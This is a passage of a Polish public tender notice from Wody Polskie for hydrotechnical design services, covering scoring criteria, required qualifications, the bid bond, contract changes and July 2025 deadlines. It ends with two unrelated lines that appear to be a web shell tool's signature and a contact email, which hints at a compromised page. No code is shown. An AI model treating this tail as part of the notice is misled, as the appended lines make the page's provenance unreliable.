tym okresie, wraz z podaniem przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są<br/>wykonywane (w tym dwa spełniające minimalny warunek udziału<br/>w postepowaniu).<br/>c) 40 pkt — otrzyma oferta w której Wykonawca wykaże zrealizowanie przez Projektanta czterech lub więcej zadań w zakresie<br/>opracowania dokumentacji projektowej na potrzeby realizacji zadań w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności<br/>jest krótszy – w tym okresie, wraz z podaniem przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub<br/>są wykonywane (w tym dwa spełniające minimalny warunek udziału w postepowaniu).<br/>Maksymalnie w kryterium „Doświadczenie zawodowe Projektanta&#34; można otrzymać 40 punktów.<br/>W celu uzyskania punktów w kryterium „Doświadczenie zawodowe Projektanta” należy:<br/>1) wypełnić punkt 2 Formularza oferty (Załącznik nr 2 do SWZ);<br/>2) złożyć formularz „Doświadczenie zawodowe Projektanta”, zgodny w treści z Załącznikiem nr 9 do SWZ, zawierający informacje<br/>potwierdzające spełnianie wymogów określonych<br/>w pkt 7.2.1 SWZ i powyżej w pkt 15.4.2 SWZ oraz podstawę dysponowania wskazaną osobą.<br/>Niedopełnienie wszystkich powyższych wymagań, w tym niedołączenie formularza „Doświadczenie zawodowe Projektanta” lub w<br/>przypadku braku kompletnych informacji (np. braku podstawy dysponowania osobą) spowoduje, że oferta w kryterium<br/>„Doświadczenie zawodowe Projektanta” uzyska 0 punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie zawodowe projektanta</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki udziału w postępowaniu<br/>dotyczące zdolności technicznej lub zawodowej:<br/>7.2.1. w zakresie dysponowania osobami<br/>Wykonawca musi wykazać, że dysponuje, lub przy realizacji zamówienia będzie dysponował osobami, które skieruje do<br/>realizacji usługi będącej przedmiotem niniejszego postepowania:<br/>a) 2 osoby, w tym co najmniej projektant i projektant sprawdzający, posiadające uprawnienia budowlane bez ograniczeń w<br/>specjalności inżynieryjnej hydrotechnicznej do projektowania lub odpowiadające wyżej wymienionym ważne uprawnienia<br/>budowlane do projektowania wydane na podstawie uprzednio obowiązujących przepisów prawa w zakresie pełnionej funkcji,<br/>adekwatne w swoim zakresie do przedmiotowej inwestycji. Osoby te powinny być czynnymi członkami Izby Inżynierów<br/>Budownictwa w okresie od zawarcia umowy do odbioru dokumentacji. Każda z osób: projektant oraz projektant<br/>sprawdzający, musi posiadać doświadczenie związane z opracowaniem minimum dwóch dokumentacji projektowych, które<br/>muszą spełniać łącznie niżej wymienione warunki:<br/>- swoim zakresem muszą obejmować wykonanie obiektu hydrotechnicznego lub umocnienia brzegu;<br/>- na podstawie dokumentacji uzyskano prawomocne decyzje o pozwoleniu na budowę;<br/>Każda z osób skierowanych do realizacji zamówienia (projektant i projektant sprawdzający) podczas opracowywania<br/>projektów jw. musiała pełnić funkcje projektanta. Wykonawca winien załączyć dowody określające, czy wykazane usługi<br/>projektowe zostały wykonane lub są wykonywane należycie.<br/>b) 1 osobę posiadającą uprawnienia do wykonywania samodzielnych funkcji w dziedzinie geodezji i kartografii w zakresie:<br/>- geodezyjne pomiary sytuacyjno-wysokościowe, realizacyjne i inwentaryzacyjne,<br/>- rozgraniczanie i podziały nieruchomości (gruntów) oraz sporządzanie dokumentacji do celów prawnych.<br/>c) 1 osobę posiadającą uprawnienia geologiczne do ustalania warunków geologiczno-inżynierskich na potrzeby<br/>zagospodarowania przestrzennego i posadowienia obiektów budowlanych, w tym posadowienia obiektów budowlanych<br/>budownictwa wodnego, lub posiadające inne uprawnienia odpowiadające powyższym, wydane na podstawie przepisów<br/>obowiązujących w czasie wydania uprawnień – kat. „VI”.<br/>7.2.2. w zakresie doświadczenia<br/>Wykonawca musi się wykazać zrealizowaniem w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli<br/>okres prowadzenia działalności jest krótszy – w tym okresie minimum dwóch dokumentacji projektowych, które muszą<br/>łącznie spełniać wymienione warunki:<br/>- muszą obejmować swoim zakresem wykonanie obiektu hydrotechnicznego lub umocnienia brzegu;<br/>- oraz na podstawie których uzyskano prawomocną decyzję o pozwoleniu na budowę.<br/>Wykonawca winien do tego załączyć dowody określające, czy te usługi zostały wykonane lub są wykonywane należycie.<br/>Uwaga: Zamawiający wymaga, aby określony powyżej warunek byt spełniony w całości przez jeden podmiot (wykonawcę<br/>lub podmiot oddający do dyspozycji wykonawcy niezbędne zasoby na potrzeby zamówienia) <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">10.4.<br/>Oświadczenia lub dokumenty potwierdzające spełnianie przez Wykonawcę warunków udziału w postępowaniu:<br/>10.4.1 Wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego posiadających kwalifikacje opisane w pkt<br/>7.2.1 – wraz z informacjami na temat kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do realizacji<br/>zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.<br/>(na potwierdzenie spełnienia warunku opisanego w pkt 7.2.1 SWZ).<br/>Zaleca się skorzystanie z druku stanowiącego załącznik nr 8 do SWZ.<br/>10.4.2. Wykaz usług wykonanych przez wykonawcę w okresie 5 lat liczonych wstecz od dnia, w którym upływa termin składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich przedmiotu, dat i miejsca wykonania<br/>oraz podmiotów, na rzecz których roboty te zostały wykonane lub są wykonywane.<br/>(na potwierdzenie spełnienia warunku opisanego w pkt 7.2.2 SWZ).<br/>Zaleca się skorzystanie z druku stanowiącego załącznik nr 7 do SWZ.<br/>10.4.3 Dowody określające, czy usługi wymienione w wykazie usług oraz wykazie osób zostały wykonane lub są wykonywane<br/>należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego<br/>roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych<br/>dokumentów – inne odpowiednie dokumenty.<br/>zgodnie z SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">7.2.1. w zakresie dysponowania osobami<br/> Wykonawca musi wykazać, że dysponuje, lub przy realizacji zamówienia będzie dysponował osobami, które skieruje do realizacji usługi będącej przedmiotem niniejszego postepowania: <br/>a)	2 osoby, w tym co najmniej projektant i projektant sprawdzający, posiadające uprawnienia budowlane bez ograniczeń w specjalności inżynieryjnej hydrotechnicznej do projektowania lub odpowiadające wyżej wymienionym ważne uprawnienia budowlane do projektowania wydane na podstawie uprzednio obowiązujących przepisów prawa w zakresie pełnionej funkcji, adekwatne w swoim zakresie do przedmiotowej inwestycji. Osoby te powinny być czynnymi członkami Izby Inżynierów Budownictwa w okresie od zawarcia umowy do odbioru dokumentacji. Każda z osób: projektant oraz projektant sprawdzający, musi posiadać doświadczenie związane z opracowaniem minimum dwóch dokumentacji projektowych, które muszą spełniać łącznie niżej wymienione warunki:<br/>-	swoim zakresem muszą obejmować wykonanie obiektu hydrotechnicznego lub umocnienia brzegu;<br/>- na podstawie dokumentacji uzyskano prawomocne decyzje o pozwoleniu na budowę; <br/>Każda z osób skierowanych do realizacji zamówienia (projektant i projektant sprawdzający) podczas opracowywania projektów jw. musiała pełnić funkcje projektanta. Wykonawca winien załączyć dowody określające, czy wykazane usługi projektowe zostały wykonane lub są wykonywane należycie.<br/>b)	1 osobę posiadającą uprawnienia do wykonywania samodzielnych funkcji w dziedzinie geodezji i kartografii w zakresie:<br/>- geodezyjne pomiary sytuacyjno-wysokościowe, realizacyjne i inwentaryzacyjne, <br/> - rozgraniczanie i podziały nieruchomości (gruntów) oraz sporządzanie dokumentacji do celów prawnych. <br/>c)	1 osobę posiadającą uprawnienia geologiczne do ustalania warunków geologiczno-inżynierskich na potrzeby zagospodarowania przestrzennego i posadowienia obiektów budowlanych, w tym posadowienia obiektów budowlanych budownictwa wodnego, lub posiadające inne uprawnienia odpowiadające powyższym, wydane na podstawie przepisów obowiązujących w czasie wydania uprawnień – kat. „VI”. <br/><br/>7.2.2. w zakresie doświadczenia <br/>Wykonawca musi się wykazać zrealizowaniem w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie minimum dwóch dokumentacji projektowych, które muszą łącznie spełniać wymienione warunki:<br/>- muszą obejmować swoim zakresem wykonanie obiektu hydrotechnicznego lub umocnienia brzegu;<br/>- oraz na podstawie których uzyskano prawomocną decyzję o pozwoleniu na budowę.<br/>Wykonawca winien do tego załączyć dowody określające, czy te usługi zostały wykonane lub są wykonywane należycie.<br/>Uwaga: Zamawiający wymaga, aby określony powyżej warunek byt spełniony w całości przez jeden podmiot (wykonawcę lub podmiot oddający do dyspozycji wykonawcy niezbędne zasoby na potrzeby zamówienia).</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 8.1.	Wykonawca zobowiązany jest, przed upływem terminu składania ofert, wnieść wadium <br/>w kwocie 6.000,00 PLN ( słownie: sześć tysięcy złotych 00/100). <br/>8.2.	Wadium może być wnoszone w jednej lub kilku następujących formach: <br/>1.	pieniądzu;<br/>2.	gwarancjach bankowych; <br/>3.	gwarancjach ubezpieczeniowych; <br/>4.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości. <br/>3.	Dokument potwierdzający wniesienie wadium w jednej z form wymienionych <br/>w pkt 8.2.2-8.2.4 SWZ musi być załączony do oferty w formie oryginału, <br/>tj. dokumentu elektronicznego, podpisanego kwalifikowanym podpisem elektronicznym, przez wystawcę dokumentu. Zamawiający nie dopuszcza złożenia tego dokumentu <br/>w jakiejkolwiek innej formie, np. pisemnej albo elektronicznej kopii opatrzonej kwalifikowanym podpisem elektronicznym. Beneficjentem takich dokumentów musi być Państwowe Gospodarstwo Wodne Wody Polskie, ul. Tytusa Chałubińskiego 8, 00-613 Warszawa. <br/>4.	W przypadku wnoszenia wadium w pieniądzu kwotę należy wpłacić przelewem na rachunek bankowy Zamawiającego prowadzony przez z RZGW Warszawa BGK o/o Warszawa Nr 43 1130 1017 0020 1510 6790 0007. W tytule przelewu należy wpisać: „Wadium w sprawie nr W.ROZ.2710.56.2025/ZZW”. <br/>5.	Wadium wnoszone w pieniądzu jest wniesione skutecznie, jeżeli zostanie zaksięgowane na rachunku bankowym Zamawiającego przed upływem terminu składania ofert. <br/>6.	Złożona gwarancja lub poręczenie musi spełniać następujące wymogi:<br/>•	Powinna zawierać w swojej treści nieodwołalne i bezwarunkowe zobowiązanie gwaranta/poręczyciela do zapłacenia kwoty wadium na pierwsze pisemne żądanie Zamawiającego w przypadku zaistnienia okoliczności, wymienionych w art. 98 ust. 6 pkt 1, 2 i 3 ustawy Pzp.<br/>•	Powinna zawierać klauzulę: prawem właściwym do rozstrzygania sporów, jakie mogłyby wyniknąć w związku ze złożonym dokumentem wadialnym jest prawo polskie, a sądem właściwym do rozstrzygania sporów jest sąd miejscowo właściwy dla siedziby Beneficjenta (Państwowego Gospodarstwa Wodnego Wody Polskie, ul. Tytusa Chałubińskiego 8, 00-613 Warszawa). <br/>•	Jeśli gwarantem jest bank lub inna jednostka organizacyjna uprawniona do wykonywania czynności bankowych, dla której mają zastosowanie przepisy art. 372 § 1 Kodeksu postępowania cywilnego (Dz.U.2019.1460 t.j. z dnia 05.08.2019 r.), dokument wadialny nie musi zawierać w/w klauzuli.<br/>•	Powinna zawierać okres ważności wadium nie krótszy niż okres związania ofertą.<br/>7.	Wadium wniesione w formie gwarancji/poręczenia nie może zawierać w swojej treści zapisu, dotyczącego konieczności poświadczenia/potwierdzenia podpisu pod oświadczeniem o zwolnieniu wadium np. przez notariusza, bank Beneficjenta. W przypadku wystąpienia takich wymogów, Zamawiający nie będzie zobowiązany do ich stosowania. Zaleca się, aby dokument zawierał adres poczty elektronicznej, na jaki należy przekazać oświadczenie o zwolnieniu wadium.<br/>8.	W przypadku składania wadium w formie niepieniężnej przez podmioty wspólnie ubiegające się o udzielenie zamówienia (konsorcjum) wskazanym jest, aby w treści gwarancji lub poręczenia byli wymienieni wszyscy wykonawcy wspólnie ubiegający się o udzielenie zamówienia albo dokument powinien zawierać co najmniej informację, że wymieniony w dokumencie wadialnym wykonawca jest liderem/jednym z uczestników konsorcjum, działającym w imieniu i na rzecz innych uczestników, którzy wspólnie złożyli lub złożą ofertę. <br/>9.	Zwrot bądź zatrzymanie wadium nastąpi zgodnie z art. 98 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Zamawiający dopuszcza możliwość składania oferty przez dwóch lub więcej Wykonawców (w ramach oferty wspólnej w rozumieniu art. 58 ustawy Pzp) pod warunkiem, że taka oferta spełniać będzie następujące wymagania:<br/>1 Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w<br/>postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego.<br/>2 Wszelka korespondencja prowadzona będzie przez Zamawiającego wyłącznie z pełnomocnikiem, którego adres należy<br/>wpisać w Formularzu oferty.<br/>3 Pełnomocnictwo lub inny dokument (np. umowa konsorcjum, spółki cywilnej) z którego wynika takie pełnomocnictwo<br/>należy złożyć razem z ofertą.<br/>4 W odniesieniu do warunków określonych w pkt 7.2 SWZ, wymagania te muszą być spełnione wspólnie przez<br/>Wykonawców składających ofertę wspólną (nie musi ich spełniać osobno każdy z Wykonawców składających ofertę<br/>wspólną). Na ich potwierdzenie należy złożyć dokumenty określone w pkt 10.4 SWZ.<br/>5 Każdy z Wykonawców wspólnie ubiegających się o zamówienie składa oświadczenie zgodne<br/>z treścią Załącznika Nr 3 do SWZ, odpowiednio na dzień składania ofert, celem potwierdzenia, że każdy z Wykonawców<br/>ubiegających się wspólnie o zamówienie nie podlega wykluczeniu<br/>z postępowania na podstawie art. 108 ust. 1 oraz art. 109 ust. 1 pkt 4, 5 i 7 ustawy Pzp, a także art. 7 ust. 1 ustawy z dnia<br/>13.04.2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących<br/>ochronie bezpieczeństwa narodowego, oraz spełnia warunki udziału w postępowaniu określone w SWZ w zakresie,<br/>w którym każdy z nich wykazuje brak podstaw wykluczenia z postępowania oraz spełnia warunki udziału w postępowaniu.<br/>6 Każdy z Wykonawców występujących wspólnie obowiązany jest do wykazania braku podstaw do wykluczenia z<br/>postępowania o udzielenie zamówienia publicznego. W takim przypadku oświadczenia lub dokumenty wymienione w pkt<br/>10.3 SWZ składa każdy z Wykonawców występujących wspólnie.<br/>7. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców,<br/>którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. W takiej sytuacji wykonawcy<br/>są zobowiązani dołączyć do oferty oświadczenie, z którego wynika, które roboty budowlane lub usługi wykonają poszczególni wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wszelkie zmiany postanowień niniejszej Umowy, inne niż określone w § 4 ust. 2, wymagają zgody obu Stron wyrażonej<br/>na piśmie pod rygorem nieważności, w formie aneksu do Umowy.<br/>2. Zamawiający przewiduje możliwość dokonania zmian w Umowie na warunkach, o których mowa w niniejszym paragrafie.<br/>Wystąpienie którejkolwiek z okoliczności wymienionych w niniejszym paragrafie nie będzie stanowiło zobowiązania Stron do<br/>wprowadzenia zmiany.<br/>3. Zamawiający dopuszcza możliwość zmiany Umowy w zakresie zmiany terminu wykonania Umowy w przypadku:<br/>1) zmiany w zapisach aktów prawnych, mających wpływ na Umowę, dopuszcza się zmianę Umowy o czas konieczny dla<br/>wprowadzenia zmian;<br/>2) w przypadku konieczności wprowadzenia zmian wynikających ze zmiany założeń strategicznych Zamawiającego<br/>odnośnie przedmiotu Umowy, które w istotny sposób wpływają na sposób realizacji Umowy lub gdy w celu prawidłowego<br/>wykonania przedmiotu Umowy niezbędna jest zmiana sposobu wykonania Umowy, o której Strony nie mogły wiedzieć w<br/>chwili podpisania Umowy dopuszcza się zmianę terminów określonych w Umowie o czas konieczny dla wprowadzenia<br/>zmian;<br/>3) wystąpienia siły wyższej, tj.: niezależnego od Stron losowego zdarzenia zewnętrznego, które było niemożliwe do<br/>przewidzenia w momencie zawarcia Umowy i któremu nie można było zapobiec mimo dochowania należytej staranności,<br/>lub działań/zaniechań Zamawiającego;<br/>4) zmiany sposobu wykonania Umowy uzasadnionej sytuacją finansową Zamawiającego lub warunkami organizacyjnymi<br/>leżącymi po stronie Zamawiającego;<br/>5) przedłużenia postępowania dotyczącego wydania prawomocnych decyzji administracyjnych (w wyniku działań<br/>podejmowanych przez odpowiednie organy prowadzące postępowanie lub inne instytucje będące stronami w sprawie).<br/>4. W sytuacji wprowadzenia zmiany w zakresie terminu wykonania obowiązków przewidzianych Umową, określonego w § 2,<br/>oraz jako konsekwencja ich wprowadzenia Zamawiający dopuszcza możliwość wprowadzenia zmian dotyczących sposobu<br/>rozliczenia Umowy, o ile taka zmiana będzie korzystna dla Zamawiającego.<br/>5. Zmiana wynagrodzenia Wykonawcy, określonego w § 6 ust. 1 (odpowiednio dla zamówienia podstawowego oraz prawa<br/>opcji), może nastąpić w następstwie:<br/>1) wystąpienia zmiany stawki podatku VAT od towarów i usług oraz podatku akcyzowego, jeżeli zmiana ta będzie miała<br/>wpływ na koszty wykonania zamówienia przez Wykonawcę<br/>2) zmiany wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 Ustawy z dnia 10<br/>października 2002 r. o minimalnym wynagrodzeniu za pracę (Dz.U. z 2024 poz. 1773), jeżeli zmiana ta będzie miała wpływ<br/>na koszty wykonania zamówienia przez Wykonawcę<br/>3) zmiany przepisów dotyczących zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub<br/>wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne, jeżeli zmiana ta będzie miała wpływ na koszty<br/>wykonania zamówienia przez Wykonawcę<br/>4) zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w Ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych (Dz.U. z 2024 poz. 427), jeżeli zmiana ta będzie miała wpływ na<br/>koszty wykonania zamówienia przez Wykonawcę<br/>Pozostałe zapisy dotyczące zmian umowy znajdują się w Projektowanych postanowieniach umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-07-21 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę oraz dokumenty lub oświadczenia składane razem z ofertą należy złożyć za pośrednictwem Platformy Zakupowej – pod adresem: https://przetargi.wody.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-07-21 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-08-19</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com